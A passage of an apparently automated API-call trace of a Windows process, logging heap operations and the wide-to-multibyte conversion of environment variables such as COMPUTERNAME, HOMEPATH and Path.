(HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1e98) returned 0x8 [0158.582] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf1e98, Size=0xc) returned 0xcf1ee8 [0158.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0158.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x37) returned 0xcf1f00 [0158.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0xcf1f00, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 55 [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1ee8) returned 0xc [0158.582] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf1ee8, Size=0x10) returned 0xcf1ee8 [0158.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0158.582] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x3c) returned 0xce5948 [0158.582] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", cchWideChar=-1, lpMultiByteStr=0xce5948, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramFiles(x86)=C:\\Program Files (x86)\\Common Files", lpUsedDefaultChar=0x0) returned 60 [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] GetLastError () returned 0x0 [0158.582] SetLastError (dwErrCode=0x0) [0158.582] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1ee8) returned 0x10 [0158.583] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf1ee8, Size=0x14) returned 0xcf1f40 [0158.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 49 [0158.583] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x31) returned 0xcf1f60 [0158.583] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CommonProgramW6432=C:\\Program Files\\Common Files", cchWideChar=-1, lpMultiByteStr=0xcf1f60, cbMultiByte=49, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CommonProgramW6432=C:\\Program Files\\Common Files", lpUsedDefaultChar=0x0) returned 49 [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.583] SetLastError (dwErrCode=0x0) [0158.583] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1f40) returned 0x14 [0158.584] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf1f40, Size=0x18) returned 0xcf1f40 [0158.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0158.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x17) returned 0xcf1fa0 [0158.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="COMPUTERNAME=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0xcf1fa0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="COMPUTERNAME=XDUWTFONO", lpUsedDefaultChar=0x0) returned 23 [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] GetLastError () returned 0x0 [0158.584] SetLastError (dwErrCode=0x0) [0158.584] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1f40) returned 0x18 [0158.584] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf1f40, Size=0x1c) returned 0xcf1fc0 [0158.584] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0158.584] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x24) returned 0xceaba0 [0158.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ComSpec=C:\\Windows\\system32\\cmd.exe", cchWideChar=-1, lpMultiByteStr=0xceaba0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ComSpec=C:\\Windows\\system32\\cmd.exe", lpUsedDefaultChar=0x0) returned 36 [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] GetLastError () returned 0x0 [0158.585] SetLastError (dwErrCode=0x0) [0158.585] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1fc0) returned 0x1c [0158.585] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf1fc0, Size=0x20) returned 0xcf1fc0 [0158.585] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0158.586] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x14) returned 0xcf1f40 [0158.586] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="FP_NO_HOST_CHECK=NO", cchWideChar=-1, lpMultiByteStr=0xcf1f40, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FP_NO_HOST_CHECK=NO", lpUsedDefaultChar=0x0) returned 20 [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.586] GetLastError () returned 0x0 [0158.586] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf1fc0) returned 0x20 [0158.587] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf1fc0, Size=0x24) returned 0xcf0a20 [0158.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0158.587] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0xd) returned 0xcee840 [0158.587] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEDRIVE=C:", cchWideChar=-1, lpMultiByteStr=0xcee840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEDRIVE=C:", lpUsedDefaultChar=0x0) returned 13 [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.587] GetLastError () returned 0x0 [0158.587] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf0a20) returned 0x24 [0158.588] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0a20, Size=0x28) returned 0xcf0a20 [0158.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 37 [0158.588] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x25) returned 0xceabd0 [0158.588] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0xceabd0, cbMultiByte=37, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HOMEPATH=\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 37 [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.588] SetLastError (dwErrCode=0x0) [0158.588] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.589] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf0a20) returned 0x28 [0158.589] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0a20, Size=0x2c) returned 0xcf0a20 [0158.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 57 [0158.589] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x39) returned 0xce5990 [0158.589] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", cchWideChar=-1, lpMultiByteStr=0xce5990, cbMultiByte=57, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOCALAPPDATA=C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", lpUsedDefaultChar=0x0) returned 57 [0158.589] GetLastError () returned 0x0 [0158.589] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.590] SetLastError (dwErrCode=0x0) [0158.590] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf0a20) returned 0x2c [0158.591] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0a20, Size=0x30) returned 0xcf0a20 [0158.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0158.591] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x18) returned 0xcf1fc0 [0158.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="LOGONSERVER=\\\\XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0xcf1fc0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LOGONSERVER=\\\\XDUWTFONO", lpUsedDefaultChar=0x0) returned 24 [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.591] GetLastError () returned 0x0 [0158.591] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] GetLastError () returned 0x0 [0158.592] SetLastError (dwErrCode=0x0) [0158.592] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf0a20) returned 0x30 [0158.593] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0a20, Size=0x34) returned 0xcf0a20 [0158.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0158.593] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0x17) returned 0xcf0a60 [0158.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="NUMBER_OF_PROCESSORS=1", cchWideChar=-1, lpMultiByteStr=0xcf0a60, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NUMBER_OF_PROCESSORS=1", lpUsedDefaultChar=0x0) returned 23 [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.593] GetLastError () returned 0x0 [0158.593] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf0a20) returned 0x34 [0158.594] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0a20, Size=0x38) returned 0xcf0a20 [0158.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0158.594] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x8, Size=0xe) returned 0xcee858 [0158.594] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="OS=Windows_NT", cchWideChar=-1, lpMultiByteStr=0xcee858, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OS=Windows_NT", lpUsedDefaultChar=0x0) returned 14 [0158.594] GetLastError () returned 0x0 [0158.594] SetLastError (dwErrCode=0x0) [0158.594] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.595] SetLastError (dwErrCode=0x0) [0158.595] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] GetLastError () returned 0x0 [0158.596] SetLastError (dwErrCode=0x0) [0158.596] RtlSizeHeap (HeapHandle=0xcd0000, Flags=0x0, MemoryPointer=0xcf0a20) returned 0x38 [0158.596] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0xcf0a20, Size=0x3c) returned 0xcf0a80 [0158.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Path=C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, 